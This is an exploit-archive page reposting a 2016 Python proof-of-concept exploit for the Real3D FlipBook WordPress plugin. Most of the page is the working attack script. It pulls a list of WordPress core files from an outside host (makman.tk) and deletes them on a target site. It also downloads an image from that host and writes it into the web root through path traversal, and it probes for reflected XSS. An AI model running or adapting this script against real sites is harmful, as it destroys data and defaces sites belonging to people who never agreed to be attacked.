首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WordPress Real3D FlipBook Plugin - Multiple Vulnerabilities
来源:https://mukarramkhalid.com/ 作者:Khalid 发布时间:2016-07-05  
#########################################################################
# [+] [POC][Exploit] CodeCanyon Real3D FlipBook WordPress Plugin
# [+] http://codecanyon.net/item/real3d-flipbook-wordpress-plugin/6942587
# [+] Multiple Vulnerabilities Found by: Mukarram Khalid
# [+] https://mukarramkhalid.com/wordpress-real-3d-flipbook-plugin-exploit/
# [+] Requirements : Python 3.4.x or higher, Requests Module
# [+] Timeline: Vuln Found : 01-07-2016, Reported to Vendor: 03-07-2016
########################################################################
 
import os, json, base64
try:
    import requests
except:
    exit('[-] Importing Requests module failed')
 
class wpFlipbook:
    ''' Wordpress 3d flipbook plugin exploit '''
 
    headers  = {'User-agent' : 'Mozilla/11.0'}
    payload1 = {'deleteBook' : ''}
    payload2 = {'imgbase' : '', 'bookName' : '../../../', 'pageName' : 'makman'}
    payload3 = {'action' : 'delete', 'bookId' : '<script>alert(/makman/)</script>'}
    imageUrl = 'http://makman.tk/makman.jpg'
    wpFilesUrl = 'http://makman.tk/wpFiles.json'
 
    def __init__(self, url):
        url = url.rstrip('/')
        if 'http://' in url or 'https://' in url:
            self.url = url
        else:
            self.url = 'http://' + url
 
    def http(self, url, data = {}, post = False):
        try:
            if post:
                r = requests.post(url, data = data, headers = self.headers, timeout = 20)
            else:
                r = requests.get(url, params = data, headers = self.headers, timeout = 20)
        except:
            exit('[-] Something went wrong. Please check your internet connection')
        return r
 
    def deleteFiles(self):
        print('[+] Loading Wordpress file structure')
        r = self.http(self.wpFilesUrl)
        wpFiles = json.loads(r.text)
        print('[+] Wordpress File structure loaded successfully')
        print('[+] Creating directory real3dflipbook')
        r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', {'imgbase' : 'makman'}, True)
        print('[+] Deleting Files from wp-includes/ & wp-admin/')
        for wpFile in wpFiles['wpFiles']:
            print('    [+] Deleting File ' + wpFile)
            self.payload1['deleteBook'] = wpFile
            r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', self.payload1, True)
        print('[+] Files have been deleted successfully')
 
    def uploadImage(self):
        print('[+] Loading image file')
        r = self.http('http://makman.tk/makman.jpg')
        encodedImage = base64.b64encode(r.content)
        self.payload2['imgbase'] = ';,' + encodedImage.decode('utf-8')
        print('[+] Uploading image file in target root directory')
        r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', self.payload2, True)
        print('[+] Image has been uploaded here ' + self.url + '/' + self.payload2['pageName'] + '.jpg')
 
    def xss(self):
        print('[+] Checking XSS payload')
        r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/flipbooks.php', self.payload3)
        if self.payload3['bookId'] in r.text:
            print('[+] Found XSS here :')
            print('    [+] ' + self.url + '/wp-content/plugins/real3d-flipbook/includes/flipbooks.php?action=' + self.payload3['action'] + '&bookId=' + self.payload3['bookId'])
 
#########################################################################################################
 
def banner():
    os.system('cls' if os.name == 'nt' else 'clear')
    tabs = '    '
    print(tabs + '*******************************************************************')
    print(tabs + '* [+] [POC][Exploit] CodeCanyon Real3D FlipBook WordPress Plugin  *')
    print(tabs + '* [+] Multiple Vulnerabilities Found by:                          *')
    print(tabs + '* [+] https://mukarramkhalid.com                                  *')
    print(tabs + '*******************************************************************\n\n')
 
def main():
    banner()
    url = input('[+] Enter Url\n[+] E.g. http://server or http://server/wordpress\n[+] ')
    exploit = wpFlipbook(url)
    exploit.deleteFiles()
    exploit.uploadImage()
    exploit.xss()
    print('[+] Done')
 
if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        exit('\n[-] CTRL-C detected.\n')
# End
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Debian Exim - Spool Local Root
·Syslog Server 1.2.3 Denial Of
·Ubuntu 16.04 local root exploi
·Apple Safari 9.1.1 Local XXE I
·Nagios XI Chained Remote Code
·Ubiquiti Administration Portal
·PrinceXML Wrapper Class Comman
·Cuckoo Sandbox Guest 2.0.1 - X
·GNU Wget < 1.18 - Arbitrary Fi
·WordPress Ultimate Membership
·VUPlayer 2.49 - .m3u Buffer Ov
·Symantec Endpoint Protection M
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved